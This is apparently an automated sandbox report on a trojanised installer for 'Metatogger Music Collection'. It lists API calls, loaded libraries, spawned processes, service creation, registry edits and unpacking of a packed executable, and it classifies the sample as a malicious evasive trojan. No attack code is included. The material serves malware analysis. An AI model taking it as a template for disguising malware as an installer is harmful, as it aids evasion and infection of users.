        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vovsoft.com
        Source: file.tmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.dr String found in binary or memory: http://www.innosetup.com/
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org).
        Source: file.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.dr String found in binary or memory: http://www.remobjects.com/ps
        Source: file.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.dr String found in binary or memory: http://www.remobjects.com/psU
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://vovsoft.com/contact/
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://vovsoft.com/contact/.
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://vovsoft.com/newsletter/
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0042ED54 NtdllDefWindowProc_A, 1_2_0042ED54
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00423AF4 NtdllDefWindowProc_A, 1_2_00423AF4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00412548 NtdllDefWindowProc_A, 1_2_00412548
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00455448 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_00455448
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00473A10 NtdllDefWindowProc_A, 1_2_00473A10
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0042E6DC: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 1_2_0042E6DC
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_0040936C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00453D4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_00453D4C
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408330 0_2_00408330
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0046C0D0 1_2_0046C0D0
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00434B5C 1_2_00434B5C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0047B0A3 1_2_0047B0A3
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_004637D4 1_2_004637D4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00444304 1_2_00444304
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0045C4C4 1_2_0045C4C4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00430700 1_2_00430700
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_004449FC 1_2_004449FC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00480B58 1_2_00480B58
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00444E08 1_2_00444E08
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00459498 1_2_00459498
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0043D5E4 1_2_0043D5E4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00465824 1_2_00465824
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00481A30 1_2_00481A30
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00487BD4 1_2_00487BD4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0042FB90 1_2_0042FB90
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00443D5C 1_2_00443D5C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00433E58 1_2_00433E58
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_022E1E90 1_2_022E1E90
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_022E1200 1_2_022E1200
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_022E1730 1_2_022E1730
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 3_2_00401051 3_2_00401051
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 3_2_00401C26 3_2_00401C26
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_00401051 4_2_00401051
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_00401C26 4_2_00401C26
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02B0BCEB 4_2_02B0BCEB
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02B0BD58 4_2_02B0BD58
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AF53A0 4_2_02AF53A0
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AEE18D 4_2_02AEE18D
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AE9E84 4_2_02AE9E84
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AF4E29 4_2_02AF4E29
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02ADEFAD 4_2_02ADEFAD
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AEDC99 4_2_02AEDC99
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AEAC3A 4_2_02AEAC3A
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AE8442 4_2_02AE8442
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AEE5A5 4_2_02AEE5A5
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AF2DB4 4_2_02AF2DB4
        Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
        Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp 9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00405964 appears 101 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00406A2C appears 38 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00455DD4 appears 68 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00403400 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00445668 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00455BC8 appears 95 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00433D70 appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 0040785C appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00451CC8 appears 88 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00408B74 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00403494 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00445938 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00403684 appears 211 times
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: String function: 02AF5330 appears 138 times
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: String function: 02AE8AE0 appears 37 times
        Source: file.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: file.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-B2M6R.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-B2M6R.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: is-B2M6R.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-B2M6R.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-B2M6R.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-QO8P8.tmp.1.dr | Static PE information: Number of sections: 11 > 10
        Source: file.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: riched20.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: usp10.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: msls31.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Section loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: appxsip.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: opcservices.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: appxsip.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: opcservices.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Section loaded: netutils.dll
        Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: metatoggermusiccollection.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: _RegDLL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: WWAN_MobileFixup 2.33.197.66.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/27@1/2
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: 4_2_02AE08B8 FormatMessageA,GetLastError
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00453D4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00454574 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: CreateServiceA,CloseServiceHandle, 3_2_00402572
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: CreateServiceA,CloseServiceHandle, 4_2_00402572
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409AD0 FindResourceA,SizeofResource,LoadResource,LockResource
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: 3_2_00402345 StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: 3_2_00402345 StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: 4_2_00402345 StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection
        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: file.exe | Virustotal: Detection: 8%
        Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
        Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp" /SL5="$20446,1681617,54272,C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Process created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -i
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Process created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -s
        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp" /SL5="$20446,1681617,54272,C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Process created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -i
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Process created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -s
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Window found: window name: TMainForm
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: file.exe | Static file information: File size 2049145 > 1048576

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Unpacked PE file: 3.2.metatoggermusiccollection.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_char2_:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Unpacked PE file: 4.2.metatoggermusiccollection.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_char2_:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Unpacked PE file: 3.2.metatoggermusiccollection.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Unpacked PE file: 4.2.metatoggermusiccollection.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00447DC0 LoadLibraryExA,LoadLibraryA,GetProcAddress
        Source: metatoggermusiccollection.exe.1.dr | Static PE information: section name: _char2_
        Source: is-7CP2O.tmp.1.dr | Static PE information: section name: /4
        Source: is-QO8P8.tmp.1.dr | Static PE information: section name: /4
        Source: is-2EOVT.tmp.1.dr | Static PE information: section name: /4
        Source: is-JTEEN.tmp.1.dr | Static PE information: section name: /4
